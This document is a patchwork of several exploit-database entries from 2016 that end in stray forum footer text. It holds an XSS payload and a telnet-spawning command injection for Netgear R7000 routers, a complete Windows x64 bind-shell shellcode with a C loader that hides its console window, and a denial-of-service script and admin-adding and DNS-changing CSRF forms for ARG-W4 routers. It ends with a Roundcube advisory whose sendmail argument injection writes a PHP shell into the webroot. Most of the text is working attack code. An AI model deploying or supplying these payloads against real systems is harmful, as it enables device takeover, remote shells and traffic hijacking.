# Exploit Title: Netgear R7000 - XSS via. DHCP hostname
# Date: 11-12-2016
# Exploit Author: Vincent Yiu
# Contact: https://twitter.com/vysecurity
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware / WebApp
# Version: V1.0.7.2_1.1.93 + LATEST to date
-Vulnerability
An user who has access to send DHCP via either VPN or Wireless connection can serve a host name with script tags to trigger XSS.
Could be potentially used to connect to open or guest WIFI hotspot and inject stored XSS into admin panel and steal cookie for authentication.
http://RouterIP/start.htm
Then visit the "view who's connected" page.
-Proof Of Concept
Set /etc/dhcp/dhclient.conf
send host-name "<script>alert('xss')</script>";
# Exploit Title: Netgear R7000 - Command Injection
# Date: 6-12-2016
# Exploit Author: Acew0rm
# Contact: https://twitter.com/Acew0rm1
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93
-Vulnerability
An unauthenticated user can inject commands threw
http://RouterIP/cgi-bin/;COMMAND.
-Proof Of Concept
http://RouterIP/;telnetd$IFS-p$IFS'45' will open telnet on port 45.
|
/*
# Title : Windows x64 Bind Shell TCP Shellcode
# size : 508 bytes
# Date : 08-12-2016
# Author : Roziul Hasan Khan Shifat
# Tested On : Windows 7 Professional x64
*/
/*
section .text
global _start
_start:
xor rdx,rdx
mov rax,[gs:rdx+0x60]
mov rsi,[rax+0x18]
mov rsi,[rsi+0x10]
lodsq
mov rsi,[rax]
mov r14,[rsi+0x30]
;----------------------
mov dl,0x88
mov ebx,[r14+0x3c]
add rbx,r14
mov ebx,[rbx+rdx]
add rbx,r14
;--------------------------
mov esi,[rbx+0x1c]
add rsi,r14 ;kernel32.dll base address
;-------------------------------
mov dx,832
mov ebx,[rsi+rdx*4]
add rbx,r14 ;LoadLibraryA()
;-------------------------------
mov dl,128
sub rsp,rdx
lea r12,[rsp]
;----------------------------------------------------
;loading ws2_32.dll
xor rdx,rdx
mov [r12],dword 'ws2_'
mov [r12+4],word '32'
mov [r12+6],byte dl
lea rcx,[r12]
sub rsp,88
call rbx
mov r15,rax ;ws2_32.dll base address
;--------------------------------------------------
xor rdx,rdx
mov dl,0x88
mov ebx,[r15+0x3c]
add rbx,r15
mov ebx,[rbx+rdx]
add rbx,r15
mov edi,[rbx+0x1c]
add rdi,r15
;------------------------------
mov dx,114*4
mov ebx,[rdi+rdx]
add rbx,r15 ;WSAStartup()
;-----------------------------------
;WSAStartup(514,&WSADATA)
xor rcx,rcx
mov cx,408
sub rsp,rcx
lea rdx,[rsp]
mov cx,514
sub rsp,88
call rbx
;-------------------------------------------
xor rdx,rdx
mov dx,98*4
mov ebx,[rdi+rdx]
add rbx,r15 ;WSASocketA()
;WSASocket(2,1,6,0,0,0)
push 6
push 1
push 2
pop rcx
pop rdx
pop r8
xor r9,r9
mov [rsp+32],r9
mov [rsp+40],r9
call rbx
mov r13,rax ;SOCKET
;--------------------------------------------
mov ebx,[rdi+80]
add rbx,r15 ;setsockopt()
;setsockopt(SOCKET,0xffff,4,&1,4)
xor rdx,rdx
mov rcx,r13
mov dx,0xffff
push 4
pop r8
mov [rsp],byte 1
lea r9,[rsp]
sub rsp,88
mov [rsp+32],r8
call rbx
;--------------------------------------------------
mov ebx,[rdi+4]
add rbx,r15 ;bind()
;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
push 16
pop r8
xor rdx,rdx
mov [r12],rdx
mov [r12+8],rdx
mov [r12],byte 2
mov [r12+2],word 0x5c11 ;port 4444 (change it if U want)
lea rdx,[r12]
mov rcx,r13
call rbx
;----------------------------------------
mov ebx,[rdi+48]
add rbx,r15 ;listen()
;listen(SOCKET,1)
push 1
pop rdx
push r13
pop rcx
call rbx
;-----------------------------------
mov ebx,[rdi]
add rbx,r15 ;accept()
;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
xor rdx,rdx
mov [r12],rdx
mov [r12+8],rdx
mov dl,16
push rdx
lea r8,[rsp]
lea rdx,[r12]
mov rcx,r13
sub rsp,88
call rbx
;-------------------------------------------
xor rdx,rdx
mov [r12],rdx
mov [r12+8],rdx
mov dl,104
xor rcx,rcx
mov [r12],dword edx
mov [r12+4],rcx
mov [r12+12],rcx
mov [r12+20],rcx
mov [r12+24],rcx
mov dl,255
inc rdx
mov [r12+0x3c],edx
mov [r12+0x50],rax
mov [r12+0x58],rax
mov [r12+0x60],rax
;--------------------------------------------------
mov [r12-4],dword 'cmdA'
mov [r12-1],byte cl
;-----------------------------------------
sub rsp,88
;CreateProcessA(NULL,"cmd",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFOMATION)
lea rdx,[r12-4] ;"cmd"
xor r8,r8 ;NULL
push r8
pop r9 ;NULL
mov [rsp+32],byte 1 ;TRUE
mov [rsp+40],r8 ;0
mov [rsp+48],r8 ;NULL
mov [rsp+56],r8 ;NULL
lea rax,[r12]
mov [rsp+64],rax
lea rax,[r12+104]
mov [rsp+72],rax
xor r10,r10
mov r10w,165*4
mov ebx,[rsi+r10]
add rbx,r14 ;CreateProcessA()
call rbx
;-----------------------------------------------
mov r10w,297*4
mov ebx,[rsi+r10]
add rbx,r14
push 1
pop rcx
add rsp,88
call rbx
*/
/*
file format pe-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 31 d2 xor %rdx,%rdx
3: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
8: 48 8b 70 18 mov 0x18(%rax),%rsi
c: 48 8b 76 10 mov 0x10(%rsi),%rsi
10: 48 ad lods %ds:(%rsi),%rax
12: 48 8b 30 mov (%rax),%rsi
15: 4c 8b 76 30 mov 0x30(%rsi),%r14
19: b2 88 mov $0x88,%dl
1b: 41 8b 5e 3c mov 0x3c(%r14),%ebx
1f: 4c 01 f3 add %r14,%rbx
22: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
25: 4c 01 f3 add %r14,%rbx
28: 8b 73 1c mov 0x1c(%rbx),%esi
2b: 4c 01 f6 add %r14,%rsi
2e: 66 ba 40 03 mov $0x340,%dx
32: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
35: 4c 01 f3 add %r14,%rbx
38: b2 80 mov $0x80,%dl
3a: 48 29 d4 sub %rdx,%rsp
3d: 4c 8d 24 24 lea (%rsp),%r12
41: 48 31 d2 xor %rdx,%rdx
44: 41 c7 04 24 77 73 32 movl $0x5f327377,(%r12)
4b: 5f
4c: 66 41 c7 44 24 04 33 movw $0x3233,0x4(%r12)
53: 32
54: 41 88 54 24 06 mov %dl,0x6(%r12)
59: 49 8d 0c 24 lea (%r12),%rcx
5d: 48 83 ec 58 sub $0x58,%rsp
61: ff d3 callq *%rbx
63: 49 89 c7 mov %rax,%r15
66: 48 31 d2 xor %rdx,%rdx
69: b2 88 mov $0x88,%dl
6b: 41 8b 5f 3c mov 0x3c(%r15),%ebx
6f: 4c 01 fb add %r15,%rbx
72: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
75: 4c 01 fb add %r15,%rbx
78: 8b 7b 1c mov 0x1c(%rbx),%edi
7b: 4c 01 ff add %r15,%rdi
7e: 66 ba c8 01 mov $0x1c8,%dx
82: 8b 1c 17 mov (%rdi,%rdx,1),%ebx
85: 4c 01 fb add %r15,%rbx
88: 48 31 c9 xor %rcx,%rcx
8b: 66 b9 98 01 mov $0x198,%cx
8f: 48 29 cc sub %rcx,%rsp
92: 48 8d 14 24 lea (%rsp),%rdx
96: 66 b9 02 02 mov $0x202,%cx
9a: 48 83 ec 58 sub $0x58,%rsp
9e: ff d3 callq *%rbx
a0: 48 31 d2 xor %rdx,%rdx
a3: 66 ba 88 01 mov $0x188,%dx
a7: 8b 1c 17 mov (%rdi,%rdx,1),%ebx
aa: 4c 01 fb add %r15,%rbx
ad: 6a 06 pushq $0x6
af: 6a 01 pushq $0x1
b1: 6a 02 pushq $0x2
b3: 59 pop %rcx
b4: 5a pop %rdx
b5: 41 58 pop %r8
b7: 4d 31 c9 xor %r9,%r9
ba: 4c 89 4c 24 20 mov %r9,0x20(%rsp)
bf: 4c 89 4c 24 28 mov %r9,0x28(%rsp)
c4: ff d3 callq *%rbx
c6: 49 89 c5 mov %rax,%r13
c9: 8b 5f 50 mov 0x50(%rdi),%ebx
cc: 4c 01 fb add %r15,%rbx
cf: 48 31 d2 xor %rdx,%rdx
d2: 4c 89 e9 mov %r13,%rcx
d5: 66 ba ff ff mov $0xffff,%dx
d9: 6a 04 pushq $0x4
db: 41 58 pop %r8
dd: c6 04 24 01 movb $0x1,(%rsp)
e1: 4c 8d 0c 24 lea (%rsp),%r9
e5: 48 83 ec 58 sub $0x58,%rsp
e9: 4c 89 44 24 20 mov %r8,0x20(%rsp)
ee: ff d3 callq *%rbx
f0: 8b 5f 04 mov 0x4(%rdi),%ebx
f3: 4c 01 fb add %r15,%rbx
f6: 6a 10 pushq $0x10
f8: 41 58 pop %r8
fa: 48 31 d2 xor %rdx,%rdx
fd: 49 89 14 24 mov %rdx,(%r12)
101: 49 89 54 24 08 mov %rdx,0x8(%r12)
106: 41 c6 04 24 02 movb $0x2,(%r12)
10b: 66 41 c7 44 24 02 11 movw $0x5c11,0x2(%r12)
112: 5c
113: 49 8d 14 24 lea (%r12),%rdx
117: 4c 89 e9 mov %r13,%rcx
11a: ff d3 callq *%rbx
11c: 8b 5f 30 mov 0x30(%rdi),%ebx
11f: 4c 01 fb add %r15,%rbx
122: 6a 01 pushq $0x1
124: 5a pop %rdx
125: 41 55 push %r13
127: 59 pop %rcx
128: ff d3 callq *%rbx
12a: 8b 1f mov (%rdi),%ebx
12c: 4c 01 fb add %r15,%rbx
12f: 48 31 d2 xor %rdx,%rdx
132: 49 89 14 24 mov %rdx,(%r12)
136: 49 89 54 24 08 mov %rdx,0x8(%r12)
13b: b2 10 mov $0x10,%dl
13d: 52 push %rdx
13e: 4c 8d 04 24 lea (%rsp),%r8
142: 49 8d 14 24 lea (%r12),%rdx
146: 4c 89 e9 mov %r13,%rcx
149: 48 83 ec 58 sub $0x58,%rsp
14d: ff d3 callq *%rbx
14f: 48 31 d2 xor %rdx,%rdx
152: 49 89 14 24 mov %rdx,(%r12)
156: 49 89 54 24 08 mov %rdx,0x8(%r12)
15b: b2 68 mov $0x68,%dl
15d: 48 31 c9 xor %rcx,%rcx
160: 41 89 14 24 mov %edx,(%r12)
164: 49 89 4c 24 04 mov %rcx,0x4(%r12)
169: 49 89 4c 24 0c mov %rcx,0xc(%r12)
16e: 49 89 4c 24 14 mov %rcx,0x14(%r12)
173: 49 89 4c 24 18 mov %rcx,0x18(%r12)
178: b2 ff mov $0xff,%dl
17a: 48 ff c2 inc %rdx
17d: 41 89 54 24 3c mov %edx,0x3c(%r12)
182: 49 89 44 24 50 mov %rax,0x50(%r12)
187: 49 89 44 24 58 mov %rax,0x58(%r12)
18c: 49 89 44 24 60 mov %rax,0x60(%r12)
191: 41 c7 44 24 fc 63 6d movl $0x41646d63,-0x4(%r12)
198: 64 41
19a: 41 88 4c 24 ff mov %cl,-0x1(%r12)
19f: 48 83 ec 58 sub $0x58,%rsp
1a3: 49 8d 54 24 fc lea -0x4(%r12),%rdx
1a8: 4d 31 c0 xor %r8,%r8
1ab: 41 50 push %r8
1ad: 41 59 pop %r9
1af: c6 44 24 20 01 movb $0x1,0x20(%rsp)
1b4: 4c 89 44 24 28 mov %r8,0x28(%rsp)
1b9: 4c 89 44 24 30 mov %r8,0x30(%rsp)
1be: 4c 89 44 24 38 mov %r8,0x38(%rsp)
1c3: 49 8d 04 24 lea (%r12),%rax
1c7: 48 89 44 24 40 mov %rax,0x40(%rsp)
1cc: 49 8d 44 24 68 lea 0x68(%r12),%rax
1d1: 48 89 44 24 48 mov %rax,0x48(%rsp)
1d6: 4d 31 d2 xor %r10,%r10
1d9: 66 41 ba 94 02 mov $0x294,%r10w
1de: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx
1e2: 4c 01 f3 add %r14,%rbx
1e5: ff d3 callq *%rbx
1e7: 66 41 ba a4 04 mov $0x4a4,%r10w
1ec: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx
1f0: 4c 01 f3 add %r14,%rbx
1f3: 6a 01 pushq $0x1
1f5: 59 pop %rcx
1f6: 48 83 c4 58 add $0x58,%rsp
1fa: ff d3 callq *%rbx
*/
#include<windows.h>
#include<stdio.h>
#include<string.h>
char
shellcode[]=\
"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x4c\x8b\x76\x30\xb2\x88\x41\x8b\x5e\x3c\x4c\x01\xf3\x8b\x1c\x13\x4c\x01\xf3\x8b\x73\x1c\x4c\x01\xf6\x66\xba\x40\x03\x8b\x1c\x96\x4c\x01\xf3\xb2\x80\x48\x29\xd4\x4c\x8d\x24\x24\x48\x31\xd2\x41\xc7\x04\x24\x77\x73\x32\x5f\x66\x41\xc7\x44\x24\x04\x33\x32\x41\x88\x54\x24\x06\x49\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x49\x89\xc7\x48\x31\xd2\xb2\x88\x41\x8b\x5f\x3c\x4c\x01\xfb\x8b\x1c\x13\x4c\x01\xfb\x8b\x7b\x1c\x4c\x01\xff\x66\xba\xc8\x01\x8b\x1c\x17\x4c\x01\xfb\x48\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x8d\x14\x24\x66\xb9\x02\x02\x48\x83\xec\x58\xff\xd3\x48\x31\xd2\x66\xba\x88\x01\x8b\x1c\x17\x4c\x01\xfb\x6a\x06\x6a\x01\x6a\x02\x59\x5a\x41\x58\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x4c\x89\x4c\x24\x28\xff\xd3\x49\x89\xc5\x8b\x5f\x50\x4c\x01\xfb\x48\x31\xd2\x4c\x89\xe9\x66\xba\xff\xff\x6a\x04\x41\x58\xc6\x04\x24\x01\x4c\x8d\x0c\x24\x48\x83\xec\x58\x4c\x89\x44\x24\x20\xff\xd3\x8b\x5f\x04\x4c\x01\xfb\x6a\x10\x41\x58\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\x41\xc6\x04\x24\x02\x66\x41\xc7\x44\x24\x02\x11\x5c\x49\x8d\x14\x24\x4c\x89\xe9\xff\xd3\x8b\x5f\x30\x4c\x01\xfb\x6a\x01\x5a\x41\x55\x59\xff\xd3\x8b\x1f\x4c\x01\xfb\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\xb2\x10\x52\x4c\x8d\x04\x24\x49\x8d\x14\x24\x4c\x89\xe9\x48\x83\xec\x58\xff\xd3\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\xb2\x68\x48\x31\xc9\x41\x89\x14\x24\x49\x89\x4c\x24\x04\x49\x89\x4c\x24\x0c\x49\x89\x4c\x24\x14\x49\x89\x4c\x24\x18\xb2\xff\x48\xff\xc2\x41\x89\x54\x24\x3c\x49\x89\x44\x24\x50\x49\x89\x44\x24\x58\x49\x89\x44\x24\x60\x41\xc7\x44\x24\xfc\x63\x6d\x64\x41\x41\x88\x4c\x24\xff\x48\x83\xec\x58\x49\x8d\x54\x24\xfc\x4d\x31\xc0\x41\x50\x41\x59\xc6\x44\x24\x20\x01\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\x4c\x89\x44\x24\x38\x49\x8d\x04\x24\x48\x89\x44\x24\x40\x49\x8d\x44\x24\x68\x48\x89\x44\x24\x48\x4d\x31\xd2\x66\x41\xba\x94\x02\x42\x8b\x1c\x16\x4c\x01\xf3\xff\xd3\x66\x41\xba\xa4\x04\x42\x8b\x1c\x16\x4c\x01\xf3\x6a\x01\x59\x48\x83\xc4\x58\xff\xd3"
;
int
main()
{
int
len=
strlen
(shellcode);
DWORD
l=0;
printf
(
"shellcode length : %d\n"
,len);
//making memory executbale
VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);
//hiding windows
AllocConsole();
ShowWindow(FindWindowA(
"ConsoleWindowClass"
,NULL),0);
//
(* (
int
(*)()) shellcode)();
return
0;
}
# Exploit Title: ARG-W4 ADSL Router - Multiple Vulnerabilities
# Date: 2016-12-11
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM
# Tested on: Windows AND Linux
# Exploit Demo : http://persian-team.ir/showthread.php?tid=196
1 - Denial of Service
#!/usr/bin/python
import urllib2
import urllib
site=raw_input("Enter Url : ")
site=site+"/form2Upnp.cgi"
username='admin'
password='admin'
p = urllib2.HTTPPasswordMgrWithDefaultRealm()
p.add_password(None, site, username, password)
handler = urllib2.HTTPBasicAuthHandler(p)
opener = urllib2.build_opener(handler)
urllib2.install_opener(opener)
post = {'daemon':' ','ext_if':'pppoe+1','submit.htm?upnp.htm':'Send'}
data = urllib.urlencode(post)
try:
html = urllib2.urlopen(site,data)
print ("Done ! c_C")
except:
print ("Done ! c_C")
2-1 Cross-Site Request Forgery (Add Admin)
<html>
<body>
<form action="http://192.168.1.1/form2userconfig.cgi" method="POST">
USER:<input type="text" name="username" value="mobham" />
<input type="hidden" name="privilege" value="2" />
PWD:<input type="text" name="newpass" value="mobham" />
RPWD:<input type="texr" name="confpass" value="mobham" />
<input type="hidden" name="adduser" value="Add" />
<input type="hidden" name="hiddenpass" value="" />
<input type="hidden" name="submit.htm?userconfig.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2-2 Cross-Site Request Forgery (Change DNS)
<html>
<body>
<form action="http://192.168.1.1/form2Dns.cgi" method="POST">
<input type="hidden" name="dnsMode" value="1" />
DNS<input type="text" name="dns1" value="2.2.2.2" />
DNS 2<input type="text" name="dns2" value="1.1.1.1" />
DNS 3<input type="text" name="dns3" value="" />
<input type="hidden" name="submit.htm?dns.htm" value="Send" />
<input type="hidden" name="save" value="Apply Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
|
Roundcube 1.2.2: Command Execution via Email
============================================
You can find the online version of the advisory here:
https://blog.ripstech.com/2016/roundcube-command-execution-via-email/
Found by Robin Peraglie with RIPS
Introduction
------------
Roundcube is a widely distributed open-source webmail software used by
many organizations and companies around the globe. The mirror on
SourceForge, for example, counts more than 260,000 downloads in the last
12 months which is only a small fraction of the actual users. Once
Roundcube is installed on a server, it provides a web interface for
authenticated users to send and receive emails with their web browser.
Affected Versions: 1.0.0 - 1.2.2
Requirements
------------
- Roundcube must be configured to use PHP's mail() function (by default)
- PHP's mail() function is configured to use sendmail (by default)
- PHP is configured to have safe_mode turned off (by default)
- An attacker must know or guess the absolute path of the webroot
Description
-----------
In Roundcube 1.2.2, and earlier, user-controlled input flows unsanitized
into the fifth argument of a call to PHP's built-in function mail()
which is documented as security critical. The problem is that the
invocation of the mail() function will cause PHP to execute the sendmail
program. The fifth argument allows to pass arguments to this execution
which allows a configuration of sendmail. Since sendmail offers the -X
option to log all mail traffic in a file, an attacker can abuse this
option and spawn a malicious PHP file in the webroot directory of the
attacked server. The following code lines trigger the vulnerability.
program/steps/mail/sendmail.inc
********************************************************************************
$from = rcube_utils::get_input_value('_from', rcube_utils::INPUT_POST,
true, $message_charset);
⋮
$sent = $RCMAIL->deliver_message($MAIL_MIME, $from, $mailto,$smtp_error,
$mailbody_file, $smtp_opts);
********************************************************************************
Here, the value of the POST parameter "_from" is fetched and Roundcube's
deliver_message() method is invoked with the value used as second
argument $from.
program/lib/Roundcube/rcube.php
********************************************************************************
public function deliver_message(&$message, $from, $mailto, &$error,
&$body_file = null, $options = null) {
⋮
if (filter_var(ini_get('safe_mode'), FILTER_VALIDATE_BOOLEAN))
$sent = mail($to, $subject, $msg_body, $header_str);
else
$sent = mail($to, $subject, $msg_body, $header_str, "-f$from");
********************************************************************************
This method will then pass the $from parameter to a call of the mail()
function. The idea is to pass a custom "from" header to the sendmail
program via the "-f" option.
Proof of Concept
----------------
When an email is sent with Roundcube, the HTTP request can be
intercepted and altered. Here, the "_from" parameter can be modified in
order to place a malicious PHP file on the system.
********************************************************************************
example@example.com -OQueueDirectory=/tmp -X/var/www/html/rce.php
********************************************************************************
This allows an attacker to spawn a shell file "rce.php" in the web root
directory with the contents of the "_subject" parameter that can contain
PHP code. After performing the request, a file with the following
content is created:
********************************************************************************
04731 >>> Recipient names must be specified
04731 <<< To: squinty@localhost
04731 <<< Subject: <?php phpinfo(); ?>
04731 <<< X-PHP-Originating-Script: 1000:rcube.php
04731 <<< MIME-Version: 1.0
04731 <<< Content-Type: text/plain; charset=US-ASCII;
04731 <<< format=flowed
04731 <<< Content-Transfer-Encoding: 7bit
04731 <<< Date: So, 20 Nov 2016 04:02:52 +0100
04731 <<< From: example@example.com -OQueueDirectory=/tmp
04731 <<< -X/var/www/html/rce.php
04731 <<< Message-ID: <390a0c6379024872a7f0310cdea24900@localhost>
04731 <<< X-Sender: example@example.com -OQueueDirectory=/tmp
04731 <<< -X/var/www/html/rce.php
04731 <<< User-Agent: Roundcube Webmail/1.2.2
04731 <<<
04731 <<< Funny e-mail message
04731 <<< [EOF]
********************************************************************************
Since the email data is unencoded, the subject parameter will be
reflected in plaintext which allows the injection of PHP tags into the
shell file.
Time Line
---------
* 2016/11/21: First contact with vendor
* 2016/11/28: Vendor agrees to coordinated disclosure
* 2016/11/28: Vendor releases updated version Roundcube 1.2.3
640
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
